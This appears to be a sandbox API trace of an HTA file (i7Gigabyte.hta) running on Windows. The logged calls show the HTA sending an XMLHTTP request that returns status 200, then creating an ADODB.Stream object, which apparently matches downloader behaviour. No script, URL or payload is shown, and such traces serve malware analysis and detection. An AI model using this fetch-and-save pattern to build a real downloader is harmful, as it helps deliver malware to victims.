[0087.520] IHTMLElementCollection:item (in: This=0x180558, name=0x398988*(varType=0x3, wReserved1=0x1b, wReserved2=0xa750, wReserved3=0x17, varVal1=0x0, varVal2=0x17ff70), index=0x398998*(varType=0x0, wReserved1=0x0, wReserved2=0x150, wReserved3=0x11, varVal1=0x110000, varVal2=0x17a750), pdisp=0x398a00 | out: pdisp=0x398a00*=0x180568) returned 0x0
[0087.520] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x180568
[0087.520] IUnknown:QueryInterface (in: This=0x180568, riid=0x72cf78bc*(Data1=0x3050f1ff, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppvObject=0x398a14 | out: ppvObject=0x398a14*=0x180598) returned 0x0
[0087.520] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x180598
[0087.521] IHTMLDocument2:get_forms (in: This=0x180598, p=0x398a20 | out: p=0x398a20*=0x181404) returned 0x0
[0087.521] IUnknown:Release (This=0x180598) returned 0x0
[0087.521] IUnknown:Release (This=0x180568) returned 0x0
[0087.521] IHTMLElementCollection:item (in: This=0x180558, name=0x398988*(varType=0x3, wReserved1=0x1b, wReserved2=0xa750, wReserved3=0x17, varVal1=0x1, varVal2=0x17ff70), index=0x398998*(varType=0x0, wReserved1=0x0, wReserved2=0x150, wReserved3=0x11, varVal1=0x110000, varVal2=0x17a750), pdisp=0x398a00 | out: pdisp=0x398a00*=0x180568) returned 0x0
[0087.521] IUnknown:QueryInterface (in: This=0x180568, riid=0x72cf78bc*(Data1=0x3050f1ff, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppvObject=0x398a14 | out: ppvObject=0x398a14*=0x180598) returned 0x0
[0087.521] IHTMLDocument2:get_forms (in: This=0x180598, p=0x398a20 | out: p=0x398a20*=0x181404) returned 0x0
[0087.521] IUnknown:Release (This=0x180598) returned 0x0
[0087.521] IUnknown:Release (This=0x180568) returned 0x0
[0087.522] IHTMLElementCollection:item (in: This=0x180558, name=0x398988*(varType=0x3, wReserved1=0x1b, wReserved2=0xa750, wReserved3=0x17, varVal1=0x2, varVal2=0x17ff70), index=0x398998*(varType=0x0, wReserved1=0x0, wReserved2=0x150, wReserved3=0x11, varVal1=0x110000, varVal2=0x17a750), pdisp=0x398a00 | out: pdisp=0x398a00*=0x180568) returned 0x0
[0087.522] IUnknown:QueryInterface (in: This=0x180568, riid=0x72cf78bc*(Data1=0x3050f1ff, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppvObject=0x398a14 | out: ppvObject=0x398a14*=0x180598) returned 0x0
[0087.522] IHTMLDocument2:get_forms (in: This=0x180598, p=0x398a20 | out: p=0x398a20*=0x181404) returned 0x0
[0087.523] IUnknown:Release (This=0x180598) returned 0x0
[0087.523] IUnknown:Release (This=0x180568) returned 0x0
[0087.523] IHTMLElementCollection:item (in: This=0x180558, name=0x398988*(varType=0x3, wReserved1=0x1b, wReserved2=0xa750, wReserved3=0x17, varVal1=0x3, varVal2=0x17ff70), index=0x398998*(varType=0x0, wReserved1=0x0, wReserved2=0x150, wReserved3=0x11, varVal1=0x110000, varVal2=0x17a750), pdisp=0x398a00 | out: pdisp=0x398a00*=0x180568) returned 0x0
[0087.523] IUnknown:QueryInterface (in: This=0x180568, riid=0x72cf78bc*(Data1=0x3050f1ff, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppvObject=0x398a14 | out: ppvObject=0x398a14*=0x180598) returned 0x0
[0087.523] IHTMLDocument2:get_forms (in: This=0x180598, p=0x398a20 | out: p=0x398a20*=0x181404) returned 0x0
[0087.523] IUnknown:Release (This=0x180598) returned 0x0
[0087.523] IUnknown:Release (This=0x180568) returned 0x0
[0087.523] IUnknown:Release (This=0x180558) returned 0x0
[0087.524] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x180538 | out: hHeap=0x110000) returned 1
[0087.525] IHTMLDocument2:get_url (in: This=0x152c68, p=0x398a0c | out: p=0x398a0c*="file://C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta") returned 0x0
[0087.525] IUnknown:AddRef (This=0x13c184) returned 0x4
[0087.525] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x6) returned 0x169880
[0087.525] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x169880 | out: hHeap=0x110000) returned 1
[0087.525] IUnknown:AddRef (This=0x13c184) returned 0x5
[0087.525] IUnknown:Release (This=0x13c184) returned 0x4
[0087.525] IUri:GetScheme (in: This=0x13c184, pdwScheme=0x398954 | out: pdwScheme=0x398954*=0x9) returned 0x0
[0087.525] IUnknown:QueryInterface (in: This=0x13c184, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x398924 | out: ppvObject=0x398924*=0x13c184) returned 0x0
[0087.526] IUnknown:Release (This=0x13c184) returned 0x4
[0087.526] IUnknown:QueryInterface (in: This=0x13c184, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x3988dc | out: ppvObject=0x3988dc*=0x13c184) returned 0x0
[0087.526] IUnknown:Release (This=0x13c184) returned 0x4
[0087.526] IUnknown:AddRef (This=0x13c184) returned 0x5
[0087.526] CreateUri (in: pwzURI="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwFlags=0x2ba5, dwReserved=0x0, ppURI=0x398998 | out: ppURI=0x398998*=0x13d18c) returned 0x0
[0087.526] IUnknown:Release (This=0x13c184) returned 0x4
[0087.526] IUnknown:QueryInterface (in: This=0x13d18c, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x398968 | out: ppvObject=0x398968*=0x13d18c) returned 0x0
[0087.526] IUnknown:Release (This=0x13d18c) returned 0x2
[0087.526] IUnknown:AddRef (This=0x13d18c) returned 0x3
[0087.526] IUnknown:Release (This=0x13d18c) returned 0x2
[0087.526] IUnknown:Release (This=0x13c184) returned 0x3
[0087.526] IUnknown:Release (This=0x13d18c) returned 0x1
[0087.527] XMLHTTP:IUnknown:Release (This=0x29c9f20) returned 0x3
[0087.527] IUnknown:Release (This=0x152c68) returned 0x0
[0087.527] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x180598 | out: hHeap=0x110000) returned 1
[0087.527] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f20, riid=0x72cbc82c*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x398a30 | out: ppvObject=0x398a30*=0x0) returned 0x80004002
[0087.527] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f20, riid=0x72cdda58*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x398a18 | out: ppvObject=0x398a18*=0x0) returned 0x80004002
[0087.527] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f20, riid=0x72cdd3a4*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x398a34 | out: ppvObject=0x398a34*=0x29c9f20) returned 0x0
[0087.527] XMLHTTP:IServiceProvider:QueryService (in: This=0x29c9f20, guidService=0x72cdda28*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x72cbc81c*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x398a20 | out: ppvObject=0x398a20*=0x0) returned 0x80004002
[0087.527] GetCurrentThreadId () returned 0xe84
[0087.527] GetCurrentThreadId () returned 0xe84
[0087.527] GetCurrentThreadId () returned 0xe84
[0087.527] XMLHTTP:IServiceProvider:QueryService (in: This=0x29c9f20, guidService=0x72cde3e4*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x72cbc82c*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x398a30 | out: ppvObject=0x398a30*=0x0) returned 0x80004002
[0087.527] GetCurrentThreadId () returned 0xe84
[0087.528] GetCurrentThreadId () returned 0xe84
[0087.528] GetCurrentThreadId () returned 0xe84
[0087.528] XMLHTTP:IServiceProvider:QueryService (in: This=0x29c9f20, guidService=0x72cde27c*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x72cdda48*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x398a24 | out: ppvObject=0x398a24*=0x152c68) returned 0x0
[0087.528] GetCurrentThreadId () returned 0xe84
[0087.528] GetCurrentThreadId () returned 0xe84
[0087.528] GetCurrentThreadId () returned 0xe84
[0087.528] IHTMLDocument2:get_url (in: This=0x152c68, p=0x398a38 | out: p=0x398a38*="file://C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta") returned 0x0
[0087.528] IUnknown:AddRef (This=0x13c184) returned 0x4
[0087.528] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x6) returned 0x169880
[0087.528] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x169880 | out: hHeap=0x110000) returned 1
[0087.528] IUnknown:AddRef (This=0x13c184) returned 0x5
[0087.528] IUnknown:Release (This=0x13c184) returned 0x4
[0087.528] IUri:GetScheme (in: This=0x13c184, pdwScheme=0x3989ac | out: pdwScheme=0x3989ac*=0x9) returned 0x0
[0087.528] IUnknown:QueryInterface (in: This=0x13c184, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x39897c | out: ppvObject=0x39897c*=0x13c184) returned 0x0
[0087.528] IUnknown:Release (This=0x13c184) returned 0x4
[0087.528] IUnknown:QueryInterface (in: This=0x13c184, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x398934 | out: ppvObject=0x398934*=0x13c184) returned 0x0
[0087.529] IUnknown:Release (This=0x13c184) returned 0x4
[0087.529] IUnknown:AddRef (This=0x13c184) returned 0x5
[0087.529] CreateUri (in: pwzURI="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwFlags=0x2ba5, dwReserved=0x0, ppURI=0x3989f0 | out: ppURI=0x3989f0*=0x13d18c) returned 0x0
[0087.529] IUnknown:Release (This=0x13c184) returned 0x4
[0087.529] IUnknown:QueryInterface (in: This=0x13d18c, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x3989c0 | out: ppvObject=0x3989c0*=0x13d18c) returned 0x0
[0087.529] IUnknown:Release (This=0x13d18c) returned 0x2
[0087.529] IUnknown:AddRef (This=0x13d18c) returned 0x3
[0087.529] IUnknown:Release (This=0x13d18c) returned 0x2
[0087.529] IUnknown:Release (This=0x13c184) returned 0x3
[0087.529] IUnknown:Release (This=0x13d18c) returned 0x1
[0087.529] XMLHTTP:IUnknown:Release (This=0x29c9f20) returned 0x3
[0087.529] IUnknown:Release (This=0x152c68) returned 0x0
[0087.529] XMLHTTP:IUnknown:Release (This=0x29c9f20) returned 0x2
[0087.529] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f20, riid=0x72cdd3a4*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x399ac0 | out: ppvObject=0x399ac0*=0x29c9f20) returned 0x0
[0087.530] XMLHTTP:IServiceProvider:QueryService (in: This=0x29c9f20, guidService=0x72cde3e4*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x72cde3e4*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x399ac4 | out: ppvObject=0x399ac4*=0x152c68) returned 0x0
[0087.530] GetCurrentThreadId () returned 0xe84
[0087.530] GetCurrentThreadId () returned 0xe84
[0087.530] GetCurrentThreadId () returned 0xe84
[0087.530] XMLHTTP:IUnknown:Release (This=0x29c9f20) returned 0x2
[0087.530] IUnknown:AddRef (This=0x152c68) returned 0x2
[0087.530] IUnknown:Release (This=0x152c68) returned 0x1
[0087.530] XMLHTTP:IUnknown:Release (This=0x2da3a10) returned 0x1
[0087.530] XMLHTTP:IDispatch:GetIDsOfNames (in: This=0x2da3a10, riid=0x663b0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x399ea4*="send", cNames=0x1, lcid=0x409, rgDispId=0x399ec8 | out: rgDispId=0x399ec8*=5) returned 0x0
[0087.530] XMLHTTP:IUnknown:AddRef (This=0x2da3a10) returned 0x2
[0087.531] XMLHTTP:IDispatch:Invoke (in: This=0x2da3a10, dispIdMember=5, riid=0x663b0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x399e6c*(rgvarg=0x29b9098, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x39a09c, pExcepInfo=0x399e80, puArgErr=0x399e7c | out: pDispParams=0x399e6c*(rgvarg=0x29b9098, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x39a09c*(varType=0x0, wReserved1=0x5f, wReserved2=0x9f20, wReserved3=0x39, varVal1=0x0, varVal2=0x39a074), pExcepInfo=0x399e80*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x399e7c*=0x2da3a10) returned 0x0
[0087.533] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f20, riid=0x72cdd3a4*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x399a7c | out: ppvObject=0x399a7c*=0x29c9f20) returned 0x0
[0087.533] XMLHTTP:IServiceProvider:QueryService (in: This=0x29c9f20, guidService=0x75a846b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x75a846b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x1b4e20 | out: ppvObject=0x1b4e20*=0x0) returned 0x80004002
[0087.534] GetCurrentThreadId () returned 0xe84
[0087.534] GetCurrentThreadId () returned 0xe84
[0087.534] GetCurrentThreadId () returned 0xe84
[0087.534] XMLHTTP:IUnknown:Release (This=0x29c9f20) returned 0x2
[0087.534] IUnknown:AddRef (This=0x152c08) returned 0x2
[0087.534] IUnknown:Release (This=0x152c08) returned 0x1
[0088.020] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f20, riid=0x72cdd3a4*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x398f44 | out: ppvObject=0x398f44*=0x29c9f20) returned 0x0
[0088.020] XMLHTTP:IServiceProvider:QueryService (in: This=0x29c9f20, guidService=0x75a96b30*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x75a96b30*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x1b5328 | out: ppvObject=0x1b5328*=0x0) returned 0x80004002
[0088.020] GetCurrentThreadId () returned 0xe84
[0088.020] GetCurrentThreadId () returned 0xe84
[0088.020] GetCurrentThreadId () returned 0xe84
[0088.020] XMLHTTP:IUnknown:Release (This=0x29c9f20) returned 0x2
[0088.678] XMLHTTP:IUnknown:Release (This=0x2da3a10) returned 0x1
[0088.679] XMLHTTP:IDispatch:GetIDsOfNames (in: This=0x2da3a10, riid=0x663b0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x399f1c*="status", cNames=0x1, lcid=0x409, rgDispId=0x399f40 | out: rgDispId=0x399f40*=7) returned 0x0
[0088.679] XMLHTTP:IUnknown:AddRef (This=0x2da3a10) returned 0x2
[0088.679] XMLHTTP:IDispatch:Invoke (in: This=0x2da3a10, dispIdMember=7, riid=0x663b0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x399ee4*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x29b9088, pExcepInfo=0x399ef8, puArgErr=0x399ef4 | out: pDispParams=0x399ee4*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x29b9088*(varType=0x3, wReserved1=0x5f, wReserved2=0x9f20, wReserved3=0x39, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x399ef8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x399ef4*=0x2da3a10) returned 0x0
[0088.680] XMLHTTP:IUnknown:Release (This=0x2da3a10) returned 0x1
[0088.680] CLSIDFromProgIDEx (in: lpszProgID="adodb.stream", lpclsid=0x399dec | out: lpclsid=0x399dec*(Data1=0x566, Data2=0x0, Data3=0x10, Data4=([0]=0x80, [1]=0x0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x6d, [6]=0x2e, [7]=0xa4))) returned 0x0
[0088.684] SysStringLen (param_1=0x0) returned 0x0
[0088.684] CoGetClassObject (in: rclsid=0x399dec*(Data1=0x566, Data2=0x0, Data3=0x10, Data4=([0]=0x80, [1]=0x0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x6d, [6]=0x2e, [7]=0xa4)), dwClsContext=0x15, pvReserved=0x0, riid=0x663b087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x399de0 | out: ppv=0x399de0*=0x254b2d0) returned 0x0
[0089.659] Stream:IUnknown:QueryInterface (in: This=0x254b2d0, riid=0x663b7884*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x399ddc | out: ppvObject=0x399ddc*=0x0) returned 0x80004002
[0089.671] Stream:IClassFactory:CreateInstance (in: This=0x254b2d0, pUnkOuter=0x0, riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x399de4 | out: ppvObject=0x399de4*=0x254b320) returned 0x0
[0089.791] Stream:IUnknown:Release (This=0x254b2d0) returned 0x1
[0089.791] Stream:IUnknown:QueryInterface (in: This=0x254b320, riid=0x663b5a50*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x399d98 | out: ppvObject=0x399d98*=0x254b350) returned 0x0
[0089.791] ??2@YAPAXI@Z () returned 0x29c9f38
[0089.791] Stream:IObjectWithSite:SetSite (This=0x254b350, pUnkSite=0x29c9f38) returned 0x0
[0089.791] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f38, riid=0x76eb97c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x399cf8 | out: ppvObject=0x399cf8*=0x0) returned 0x80004002
[0089.791] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f38, riid=0x76ec3e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x399ce8 | out: ppvObject=0x399ce8*=0x0) returned 0x80004002
[0089.791] XMLHTTP:IUnknown:AddRef (This=0x29c9f38) returned 0x2
[0089.791] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f38, riid=0x662f3000*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x399d48 | out: ppvObject=0x399d48*=0x0) returned 0x80004002
[0089.792] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f38, riid=0x66271c68*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x399d44 | out: ppvObject=0x399d44*=0x29c9f38) returned 0x0
[0089.792] XMLHTTP:IServiceProvider:QueryService (in: This=0x29c9f38, guidService=0x66271c58*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x662f2ff0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x399d6c | out: ppvObject=0x399d6c*=0x180568) returned 0x0
[0089.792] GetCurrentThreadId () returned 0xe84
[0089.792] GetCurrentThreadId () returned 0xe84
[0089.792] GetCurrentThreadId () returned 0xe84
[0089.792] XMLHTTP:IUnknown:Release (This=0x29c9f38) returned 0x2
[0089.793] IHTMLDocument2:get_url (in: This=0x180568, p=0x399d70 | out: p=0x399d70*="file://C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta") returned 0x0
[0089.793] IUnknown:AddRef (This=0x13c184) returned 0x3
[0089.793] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x6) returned 0x1698a0
[0089.793] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1698a0 | out: hHeap=0x110000) returned 1
[0089.793] IUnknown:AddRef (This=0x13c184) returned 0x4
[0089.793] IUnknown:Release (This=0x13c184) returned 0x3
[0089.793] IUri:GetScheme (in: This=0x13c184, pdwScheme=0x399d08 | out: pdwScheme=0x399d08*=0x9) returned 0x0
[0089.793] IUnknown:QueryInterface (in: This=0x13c184, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x399cd8 | out: ppvObject=0x399cd8*=0x13c184) returned 0x0
[0089.793] IUnknown:Release (This=0x13c184) returned 0x3
[0089.793] IUnknown:QueryInterface (in: This=0x13c184, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x399c90 | out: ppvObject=0x399c90*=0x13c184) returned 0x0
[0089.794] IUnknown:Release (This=0x13c184) returned 0x3
[0089.794] IUnknown:AddRef (This=0x13c184) returned 0x4
[0089.794] CreateUri (in: pwzURI="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwFlags=0x2ba5, dwReserved=0x0, ppURI=0x399d4c | out: ppURI=0x399d4c*=0x13d18c) returned 0x0
[0089.794] IUnknown:Release (This=0x13c184) returned 0x3
[0089.794] IUnknown:QueryInterface (in: This=0x13d18c, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x399d1c | out: ppvObject=0x399d1c*=0x13d18c) returned 0x0
[0089.794] IUnknown:Release (This=0x13d18c) returned 0x2
[0089.794] IUnknown:AddRef (This=0x13d18c) returned 0x3
[0089.794] IUnknown:Release (This=0x13d18c) returned 0x2
[0089.794] IUnknown:Release (This=0x13c184) returned 0x2
[0089.794] IUnknown:Release (This=0x13d18c) returned 0x1
[0089.795] IUnknown:Release (This=0x180568) returned 0x0
[0089.795] Stream:IUnknown:Release (This=0x254b350) returned 0x1
[0089.795] Stream:IUnknown:QueryInterface (in: This=0x254b320, riid=0x663b5700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x399d84 | out: ppvObject=0x399d84*=0x0) returned 0x80004002
[0089.795] Stream:IUnknown:QueryInterface (in: This=0x254b320, riid=0x663b55f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x399d80 | out: ppvObject=0x399d80*=0x0) returned 0x80004002
